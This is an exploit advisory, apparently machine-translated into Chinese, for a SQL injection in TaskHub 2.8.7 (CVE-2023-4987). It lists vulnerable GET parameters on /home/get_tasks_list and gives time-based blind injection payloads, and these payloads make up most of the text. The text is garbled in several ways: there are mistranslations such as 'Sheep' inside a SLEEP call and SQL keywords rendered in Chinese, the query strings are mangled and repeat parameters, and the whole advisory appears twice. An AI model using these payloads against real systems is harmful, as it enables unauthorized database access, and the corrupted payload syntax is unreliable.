#利用标题: TaskHub 2.8.7 -SQL注入
#利用作者:饼干
#日期: 05/09/2023
#vendor: Infinitie Technologies
#供应商homepage: https://www.infinititech.com/
#软件link: https://codecanyon.net/item/taskhub-project-management-finance-finance-crm-tool/25685874
#demo: https://taskhub.company/auth
#测试在: Windows 10 Pro
#Impact:数据库访问
#CVE: CVE-2023-4987
#CWE: CWE-89-CWE-74-CWE-707
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
SQL注入攻击可以允许未经授权访问敏感数据,修改
数据并崩溃应用程序或使其无法使用,导致收入损失,并且
损害公司声誉。
PATH: /HOME /GET_TASKS_LIST
获取参数“项目”很容易受到SQL注入的影响
获取参数“状态”很容易受到SQL注入的影响
获取参数'user_id'很容易受到SQL注入的影响
获取参数“排序”很容易受到SQL注入的影响
获取参数“搜索”很容易受到SQL注入的影响
https://taskhub.company/home/get_tasks_list?project=[sqli] status=[sqli] from=workspace_id=1user_id=[sqli] is_admin=limit=limit=10sort=10Sort=[sqli]
---
参数:项目(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
PAYLOLAL: PROCPENT='XOR(SELECT(0)来自(Select(Sleep(Sheep(8)))))Xor'zstatus=from=to=to=workspace_id=1user_id=1user_id=23is_admin=limit=limit=limit=10sort=idorder=idorder=idorder=descoffset=descoffset=descoffset=0search=0search=
参数:状态(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
PAYLOAD: PROCPENT=status='XOR(SELECT(0)来自(Select(Sleep(8)))))Xor'zfrom=to=workspace_id=1USER_ID=1USER_ID=23IS_ADMIN=limit=limit=limit=10sort=idorder=idorder=descoffset=descoffset=descoffset=0search=0search=0search=
参数: USER_ID(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
payload: project=status=status=to==workspace_id=1user_id=(select(select(select(sleep(8)))a)is_admin=limit=limit=10sort=10sort=idorder=idorder=descoffset=descoffset=0search=0search=
参数:排序(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
payload: project=status=to=to=workspace_id=1user_id=23is_admin=limit=limit=10sort=(select(select(0)from(select(select(sleep(6)))a)order=descoffset=descoffset=0search=0search=
参数:搜索(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
payload: project=status=to=to=workspace_id=1user_id=23is_admin=limit=limit=10sort=10sort=idorder=descoffset=descoffset=0searchs=')and(select(select(select(select(select(7))a)a) - wxyw
---
[-] 完毕
#利用作者:饼干
#日期: 05/09/2023
#vendor: Infinitie Technologies
#供应商homepage: https://www.infinititech.com/
#软件link: https://codecanyon.net/item/taskhub-project-management-finance-finance-crm-tool/25685874
#demo: https://taskhub.company/auth
#测试在: Windows 10 Pro
#Impact:数据库访问
#CVE: CVE-2023-4987
#CWE: CWE-89-CWE-74-CWE-707
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
SQL注入攻击可以允许未经授权访问敏感数据,修改
数据并崩溃应用程序或使其无法使用,导致收入损失,并且
损害公司声誉。
PATH: /HOME /GET_TASKS_LIST
获取参数“项目”很容易受到SQL注入的影响
获取参数“状态”很容易受到SQL注入的影响
获取参数'user_id'很容易受到SQL注入的影响
获取参数“排序”很容易受到SQL注入的影响
获取参数“搜索”很容易受到SQL注入的影响
https://taskhub.company/home/get_tasks_list?project=[sqli] status=[sqli] from=workspace_id=1user_id=[sqli] is_admin=limit=limit=10sort=10Sort=[sqli]
---
参数:项目(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
PAYLOLAL: PROCPENT='XOR(SELECT(0)来自(Select(Sleep(Sheep(8)))))Xor'zstatus=from=to=to=workspace_id=1user_id=1user_id=23is_admin=limit=limit=limit=10sort=idorder=idorder=idorder=descoffset=descoffset=descoffset=0search=0search=
参数:状态(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
PAYLOAD: PROCPENT=status='XOR(SELECT(0)来自(Select(Sleep(8)))))Xor'zfrom=to=workspace_id=1USER_ID=1USER_ID=23IS_ADMIN=limit=limit=limit=10sort=idorder=idorder=descoffset=descoffset=descoffset=0search=0search=0search=
参数: USER_ID(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
payload: project=status=status=to==workspace_id=1user_id=(select(select(select(sleep(8)))a)is_admin=limit=limit=10sort=10sort=idorder=idorder=descoffset=descoffset=0search=0search=
参数:排序(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
payload: project=status=to=to=workspace_id=1user_id=23is_admin=limit=limit=10sort=(select(select(0)from(select(select(sleep(6)))a)order=descoffset=descoffset=0search=0search=
参数:搜索(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
payload: project=status=to=to=workspace_id=1user_id=23is_admin=limit=limit=10sort=10sort=idorder=descoffset=descoffset=0searchs=')and(select(select(select(select(select(7))a)a) - wxyw
---
[-] 完毕